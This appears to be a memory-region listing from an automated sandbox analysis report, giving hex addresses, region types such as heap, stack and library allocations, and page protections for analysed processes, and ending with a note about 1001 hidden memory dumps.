page read and write
3BD1000
trusted library allocation
page read and write
B638FFE000
stack
page read and write
16C9FB000
stack
page read and write
FC4000
trusted library allocation
page read and write
3023000
heap
page execute and read and write
1D45AFB4000
heap
page read and write
1490000
trusted library allocation
page read and write
189C640F000
heap
page read and write
1D45924E000
heap
page read and write
2E30000
trusted library allocation
page read and write
189C5702000
heap
page read and write
189C56A4000
heap
page read and write
7FF887E3D000
trusted library allocation
page execute and read and write
4460000
trusted library allocation
page read and write
13E0000
heap
page read and write
51EE000
stack
page read and write
1D457854000
heap
page read and write
1D456B70000
trusted library allocation
page read and write
189C6448000
heap
page read and write
189C5460000
heap
page read and write
125E000
heap
page read and write
1D43EAE0000
heap
page execute and read and write
1BD62000
unkown
page readonly
1BC6E000
stack
page read and write
189C5F56000
heap
page read and write
189C5F52000
heap
page read and write
1D44ED40000
trusted library allocation
page read and write
189C64B6000
heap
page read and write
980000
heap
page read and write
1E0E74E0000
heap
page read and write
141D000
heap
page read and write
5B0000
heap
page read and write
B638E7B000
stack
page read and write
16D17E000
unkown
page readonly
FB0000
trusted library allocation
page read and write
1D43EDB6000
trusted library allocation
page read and write
1161000
heap
page read and write
1D43CEC0000
heap
page read and write
1E0EC740000
trusted library allocation
page read and write
1672000
trusted library allocation
page read and write
189C5DD0000
remote allocation
page read and write
1E0E727B000
heap
page read and write
1D43EDD7000
trusted library allocation
page read and write
1650000
heap
page read and write
7FF888040000
trusted library allocation
page read and write
1E0EC8F2000
heap
page read and write
2726AA02000
unkown
page read and write
55F0000
trusted library allocation
page read and write
1660000
heap
page read and write
1E0E72A0000
heap
page read and write
AC8000
heap
page read and write
1D457330000
heap
page read and write
7FF887E2D000
trusted library allocation
page execute and read and write
7FF888090000
trusted library allocation
page read and write
FE1000
unkown
page execute read
7FF888000000
trusted library allocation
page read and write
1D459221000
heap
page read and write
7FF888080000
trusted library allocation
page read and write
1D457859000
heap
page read and write
7FF887FD0000
trusted library allocation
page read and write
7FF888027000
trusted library allocation
page read and write
16D278000
stack
page read and write
7FF887E03000
trusted library allocation
page execute and read and write
A32000
unkown
page readonly
1D45786F000
heap
page read and write
7FF888010000
trusted library allocation
page read and write
1C800000
heap
page read and write
B639A7E000
stack
page read and write
1E0E7A00000
heap
page read and write
189C6483000
heap
page read and write
189C5F35000
heap
page read and write
1640000
trusted library allocation
page read and write
1D4591B5000
heap
page read and write
1C7DD000
stack
page read and write
1D45788B000
heap
page read and write
7FF8881CA000
trusted library allocation
page read and write
189C5F34000
heap
page read and write
189C5DD0000
remote allocation
page read and write
B63A67E000
unkown
page readonly
1E0E7B1A000
heap
page read and write
5532000
unkown
page readonly
1BE00000
heap
page read and write
1630000
trusted library allocation
page read and write
1BD60000
unkown
page readonly
B60000
heap
page read and write
189C5F5D000
heap
page read and write
2F5E000
stack
page read and write
1D43EAF0000
heap
page execute and read and write
3D00000
trusted library allocation
page read and write
189C5F40000
heap
page read and write
1280000
heap
page read and write
2771000
trusted library allocation
page read and write
189C5F67000
heap
page read and write
3CF0000
trusted library allocation
page execute and read and write
12DBD000
trusted library allocation
page read and write
189C573B000
heap
page read and write
1D43D120000
trusted library allocation
page read and write
189C64C6000
heap
page read and write
1914000
trusted library allocation
page read and write
189C562B000
heap
page read and write
9831DFE000
stack
page read and write
1B6B8000
heap
page read and write
2726AB15000
trusted library allocation
page read and write
7FF8881B6000
trusted library allocation
page read and write
7FF888070000
trusted library allocation
page read and write
1E0E7B1A000
heap
page read and write
1D44EB71000
trusted library allocation
page read and write
1D457660000
heap
page read and write
5BDE000
stack
page read and write
9831BFE000
stack
page read and write
7FF888050000
trusted library allocation
page read and write
189C5702000
heap
page read and write
1BE78000
heap
page read and write
7FF888380000
trusted library allocation
page read and write
31A1000
trusted library allocation
page read and write
1D4573B3000
heap
page execute and read and write
1E0EC85A000
heap
page read and write
B60000
unkown
page readonly
7FF888300000
trusted library allocation
page execute and read and write
7FF887EE0000
trusted library allocation
page execute and read and write
1D45915E000
heap
page read and write
1E0E72A7000
heap
page read and write
1D43CF7A000
heap
page read and write
1E0EC80F000
heap
page read and write
7FF8880A3000
trusted library allocation
page read and write
189C64BE000
heap
page read and write
3E40000
unkown
page readonly
1D43CF4C000
heap
page read and write
1E0E722B000
heap
page read and write
123E000
stack
page read and write
1D4591DC000
heap
page read and write
1D43D0C0000
heap
page read and write
1D43CE90000
heap
page read and write
4430000
trusted library allocation
page read and write
121B000
heap
page read and write
189C572B000
heap
page read and write
98318F3000
stack
page read and write
1D4589FC000
heap
page read and write
3020000
heap
page execute and read and write
189C6481000
heap
page read and write
319E000
stack
page read and write
1D45918A000
heap
page read and write
2E32000
trusted library allocation
page read and write
1D456BA0000
trusted library allocation
page read and write
7FF8881F0000
trusted library allocation
page read and write
B638677000
stack
page read and write
2E50000
trusted library allocation
page read and write
189C5480000
heap
page read and write
2726A940000
heap
page read and write
2726AA39000
heap
page read and write
1D4591D4000
heap
page read and write
7FF888330000
trusted library allocation
page read and write
2E9E000
stack
page read and write
1E0E8360000
trusted library section
page readonly
189C5F02000
heap
page read and write
1D43EB3F000
trusted library section
page readonly
1D43EBF8000
trusted library allocation
page read and write
1E0EC8E0000
heap
page read and write
30EE000
stack
page read and write
FED000
unkown
page readonly
1E0E7970000
trusted library allocation
page read and write
56B000
stack
page read and write
98320FD000
stack
page read and write
12A2000
unkown
page readonly
1463000
heap
page read and write
418E000
stack
page read and write
1680000
heap
page read and write
15D0000
heap
page execute and read and write
43D0000
trusted library allocation
page read and write
5490000
trusted library allocation
page read and write
189C6500000
heap
page read and write
3631000
trusted library allocation
page read and write
1D43EB8A000
trusted library allocation
page read and write
2EE0000
trusted library allocation
page execute and read and write
B63947E000
unkown
page readonly
FD0000
trusted library allocation
page read and write
1E0EC7F0000
trusted library allocation
page read and write
98321F4000
stack
page read and write
1D4592E6000
heap
page read and write
1D43D1E0000
heap
page read and write
FE0000
unkown
page readonly
5880000
trusted library allocation
page execute and read and write
1D45AF8A000
heap
page read and write
1E0E7302000
heap
page read and write
7FF887ED6000
trusted library allocation
page read and write
189C5F2B000
heap
page read and write
189C56D3000
heap
page read and write
10D3000
heap
page read and write
1E0EC82C000
heap
page read and write
7FF888350000
trusted library allocation
page read and write
7FF887F06000
trusted library allocation
page execute and read and write
7FF8880A0000
trusted library allocation
page read and write
2726AF13000
heap
page read and write
7FF887FD0000
trusted library allocation
page read and write
189C5F63000
heap
page read and write
1615000
heap
page read and write
1D43D225000
heap
page read and write
B638B7E000
unkown
page readonly
164D000
trusted library allocation
page execute and read and write
9DE000
heap
page read and write
1E0EC861000
heap
page read and write
143B000
heap
page read and write
B73000
unkown
page readonly
7FF8880E0000
trusted library allocation
page read and write
121E000
heap
page read and write
189C5F59000
heap
page read and write
7FF888190000
trusted library allocation
page read and write
1D43D100000
trusted library allocation
page read and write
7FF887E2D000
trusted library allocation
page execute and read and write
9831FFC000
stack
page read and write
5E0000
heap
page read and write
189C5F2E000
heap
page read and write
1D43EBEF000
trusted library allocation
page read and write
3EC0000
trusted library allocation
page read and write
1676000
trusted library allocation
page execute and read and write
151E000
stack
page read and write
B63917E000
unkown
page readonly
1D457882000
heap
page read and write
15BC000
stack
page read and write
A30000
unkown
page readonly
B6391FE000
stack
page read and write
A2B000
heap
page read and write
B639F7C000
stack
page read and write
1B690000
heap
page read and write
7FF887FAC000
trusted library allocation
page read and write
1E0EC883000
heap
page read and write
1B74F000
heap
page read and write
1D459193000
heap
page read and write
7FF888064000
trusted library allocation
page read and write
7FF888140000
trusted library allocation
page read and write
E50000
heap
page read and write
1C5EE000
stack
page read and write
4630000
trusted library allocation
page execute and read and write
98315BF000
stack
page read and write
7FF8881E0000
trusted library allocation
page read and write
7FF887EE0000
trusted library allocation
page read and write
3EE0000
unkown
page readonly
7FF887E30000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
2726A920000
heap
page read and write
1BE6E000
heap
page read and write
7FF887E4D000
trusted library allocation
page execute and read and write
7FF887FA9000
trusted library allocation
page read and write
189C5F32000
heap
page read and write
1D43EF42000
trusted library allocation
page read and write
147B000
trusted library allocation
page execute and read and write
1D43CF00000
heap
page read and write
7FF888230000
trusted library allocation
page execute and read and write
2726AE13000
heap
page read and write
189C5F32000
heap
page read and write
189C5F6B000
heap
page read and write
1D45AEF0000
heap
page read and write
1E0E71E0000
heap
page read and write
9831EF8000
stack
page read and write
1E0E725B000
heap
page read and write
1130000
heap
page read and write
2E50000
heap
page read and write
7FF888320000
trusted library allocation
page read and write
43E0000
trusted library allocation
page read and write
1D457230000
heap
page read and write
7FF888150000
trusted library allocation
page read and write
9DA000
heap
page read and write
F46000
heap
page read and write
1D457840000
heap
page read and write
1D43EB71000
trusted library allocation
page read and write
337D000
trusted library allocation
page read and write
1B800000
heap
page read and write
189C571A000
heap
page read and write
43CF000
stack
page read and write
1D43D1C5000
heap
page read and write
A6B000
heap
page read and write
1D4589D7000
heap
page read and write
2726AF13000
heap
page read and write
189C644A000
heap
page read and write
189C5F5B000
heap
page read and write
189C5DD0000
remote allocation
page read and write
189C5F2A000
heap
page read and write
1D45930D000
heap
page read and write
10ED000
heap
page read and write
B60000
unkown
page readonly
189C5F53000
heap
page read and write
7FF888370000
trusted library allocation
page read and write
1D457862000
heap
page read and write
1AEE000
trusted library allocation
page read and write
7FF887E23000
trusted library allocation
page execute and read and write
189C5F57000
heap
page read and write
9831CFB000
stack
page read and write
7FF888110000
trusted library allocation
page read and write
1D43EDD5000
trusted library allocation
page read and write
1D43CF75000
heap
page read and write
7FF887E1D000
trusted library allocation
page execute and read and write
9832AFE000
stack
page read and write
161F000
stack
page read and write
839F67E000
stack
page read and write
1D4592FB000
heap
page read and write
1B6CF000
heap
page read and write
189C56FF000
heap
page read and write
1B9A0000
heap
page read and write
1E0EC8F7000
heap
page read and write
189C56CF000
heap
page read and write
7FF888020000
trusted library allocation
page execute and read and write
7FF887FF0000
trusted library allocation
page read and write
1259000
heap
page read and write
1D43EE27000
trusted library allocation
page read and write
56D0000
heap
page execute and read and write
B639C7E000
unkown
page readonly
189C572B000
heap
page read and write
1D45AFE6000
heap
page read and write
7FF887EF0000
trusted library allocation
page execute and read and write
3BB6000
trusted library allocation
page read and write
2777000
trusted library allocation
page read and write
1D43CEA0000
heap
page read and write
1D43EE6A000
trusted library allocation
page read and write
7FF887E54000
trusted library allocation
page read and write
7FF888030000
trusted library allocation
page read and write
7FF887ED0000
trusted library allocation
page read and write
16F5000
heap
page read and write
16D97E000
unkown
page readonly
98322FE000
stack
page read and write
B6396FE000
stack
page read and write
1D43CF32000
heap
page read and write
1E0E7980000
trusted library section
page read and write
1D43EDBA000
trusted library allocation
page read and write
35B0000
trusted library allocation
page read and write
1D45AF0A000
heap
page read and write
189C5F5B000
heap
page read and write
FC0000
trusted library allocation
page read and write
B4E000
stack
page read and write
1103000
heap
page read and write
5A1E000
stack
page read and write
7FF887E32000
trusted library allocation
page read and write
189C6444000
heap
page read and write
7FF887F40000
trusted library allocation
page execute and read and write
1D43CF15000
heap
page read and write
98326FE000
stack
page read and write
1E0E7400000
heap
page read and write
B63897E000
unkown
page readonly
7FF8880D0000
trusted library allocation
page read and write
7FF887E00000
trusted library allocation
page read and write
1E0EC7D1000
trusted library allocation
page read and write
1D459170000
heap
page read and write
15E0000
trusted library allocation
page read and write
1472000
trusted library allocation
page read and write
B639E7E000
unkown
page readonly
7FF8882F0000
trusted library allocation
page read and write
7FF888046000
trusted library allocation
page read and write
1D43EF44000
trusted library allocation
page read and write
189C6444000
heap
page read and write
E59000
heap
page read and write
189C5E15000
heap
page read and write
1B6E5000
heap
page read and write
5480000
trusted library allocation
page read and write
AAE000
stack
page read and write
1D4589E8000
heap
page read and write
7FF8881D0000
trusted library allocation
page read and write
1D459317000
heap
page read and write
B638A7C000
stack
page read and write
3030000
heap
page execute and read and write
1C811000
heap
page read and write
AC0000
heap
page read and write
4450000
trusted library allocation
page execute and read and write
1D43F13A000
trusted library allocation
page read and write
3BB2000
trusted library allocation
page read and write
1D43F1F0000
trusted library allocation
page read and write
AFF000
heap
page read and write
ED8000
stack
page read and write
2DE0000
heap
page read and write
1E0E7B00000
heap
page read and write
17FF000
stack
page read and write
BA0000
heap
page read and write
1D43EDAA000
trusted library allocation
page read and write
1E0E72A2000
heap
page read and write
2D6F000
stack
page read and write
FF4000
unkown
page write copy
11FE000
stack
page read and write
7FF8881B4000
trusted library allocation
page read and write
B63997E000
unkown
page readonly
7FF887FB7000
trusted library allocation
page read and write
7FF888060000
trusted library allocation
page execute and read and write
189C5F2C000
heap
page read and write
189C5F53000
heap
page read and write
1B75C000
heap
page read and write
98329FD000
stack
page read and write
189C5F72000
heap
page read and write
189C5590000
trusted library allocation
page read and write
12E0000
heap
page read and write
FA0000
heap
page read and write
7FF887E2B000
trusted library allocation
page execute and read and write
983157F000
stack
page read and write
1D43F136000
trusted library allocation
page read and write
1E0E7279000
heap
page read and write
16F0000
heap
page read and write
FED000
unkown
page readonly
7FF888050000
trusted library allocation
page read and write
1D44ED10000
trusted library allocation
page read and write
839F47D000
stack
page read and write
E56000
heap
page read and write
16D77E000
unkown
page readonly
7FF887EB6000
trusted library allocation
page read and write
7FF888070000
trusted library allocation
page read and write
3C10000
trusted library allocation
page read and write
EF4000
stack
page read and write
2726AF02000
heap
page read and write
3D17000
trusted library allocation
page read and write
1D44ED01000
trusted library allocation
page read and write
2726AB00000
trusted library allocation
page read and write
189C64CE000
heap
page read and write
2726AA00000
unkown
page read and write
16DB7E000
unkown
page readonly
2F20000
heap
page execute and read and write
7FF888080000
trusted library allocation
page read and write
129E000
stack
page read and write
B61000
unkown
page execute read
FD0000
trusted library allocation
page read and write
B5B000
heap
page read and write
1D43CF2C000
heap
page read and write
7FF887FB3000
trusted library allocation
page read and write
5B1D000
stack
page read and write
1E0ECA33000
trusted library allocation
page read and write
16D57E000
unkown
page readonly
F40000
heap
page read and write
189C571A000
heap
page read and write
2D4E000
stack
page read and write
1D457390000
heap
page read and write
2726AB24000
heap
page read and write
141B000
heap
page read and write
7FF887EDC000
trusted library allocation
page execute and read and write
98319FE000
stack
page read and write
189C64BE000
heap
page read and write
7FF888090000
trusted library allocation
page read and write
2726AF00000
heap
page read and write
D20000
heap
page read and write
1E0E7226000
heap
page read and write
1E0E7D91000
trusted library allocation
page read and write
2726AA2B000
heap
page read and write
7FF887E44000
trusted library allocation
page read and write
1644000
trusted library allocation
page read and write
2EF0000
trusted library allocation
page read and write
3060000
heap
page execute and read and write
1E0ECA90000
trusted library allocation
page read and write
1BEA5000
heap
page read and write
118E000
heap
page read and write
189C6479000
heap
page read and write
189C5F37000
heap
page read and write
1D44ED98000
trusted library allocation
page read and write
5CDE000
stack
page read and write
12A0000
unkown
page readonly
1D457830000
heap
page read and write
2C2E000
stack
page read and write
7FF887E8C000
trusted library allocation
page execute and read and write
7FF8880F0000
trusted library allocation
page read and write
7FF887FA1000
trusted library allocation
page read and write
1610000
heap
page read and write
1670000
trusted library allocation
page read and write
D27000
heap
page read and write
1E0EC8F2000
heap
page read and write
4420000
trusted library allocation
page read and write
B639AFE000
stack
page read and write
1D43F0EE000
trusted library allocation
page read and write
443F000
trusted library allocation
page read and write
BD4000
heap
page read and write
5380000
heap
page read and write
1D4591BB000
heap
page read and write
189C642D000
heap
page read and write
189C6432000
heap
page read and write
1D45AFC0000
heap
page read and write
1BD6F000
stack
page read and write
F60000
heap
page read and write
1D43EB43000
heap
page read and write
AF1000
heap
page read and write
1E0EC8C5000
heap
page read and write
319F000
trusted library allocation
page read and write
1B910000
unkown
page readonly
83D000
stack
page read and write
7FF888130000
trusted library allocation
page read and write
3D20000
heap
page execute and read and write
1C7F9000
heap
page read and write
1D45917B000
heap
page read and write
189C5F2C000
heap
page read and write
3BF9000
trusted library allocation
page read and write
1D43EB30000
trusted library section
page readonly
7FF888020000
trusted library allocation
page read and write
10EF000
heap
page read and write
189C64B6000
heap
page read and write
176E000
stack
page read and write
189C5F27000
heap
page read and write
7FF888030000
trusted library allocation
page read and write
7FF888360000
trusted library allocation
page read and write
7FF888240000
trusted library allocation
page read and write
1D43CF30000
heap
page read and write
1E0E72FF000
heap
page read and write
189C64A0000
heap
page read and write
There are 1001 hidden memdumps, click here to show them.